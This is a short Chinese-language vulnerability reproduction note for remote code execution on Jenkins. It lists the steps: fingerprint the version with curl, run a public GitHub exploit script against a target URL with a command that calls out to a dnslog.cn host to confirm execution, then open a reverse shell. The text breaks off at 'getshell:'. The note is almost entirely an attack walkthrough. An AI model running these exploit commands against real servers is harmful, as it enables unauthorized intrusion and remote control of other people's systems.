漏洞复现 1、查看目标版本。 curl -s -I http://xxx:8080| grep X-Jenkins 2、利用工具。 https://github.com/orangetw/awesome-jenkins-rce-2019 usage: python2.7m exp.py http://target.com ‘curl b2x6ay.dnslog.cn’ 3、成功接收dnslog。 4、反弹shell。 getshell: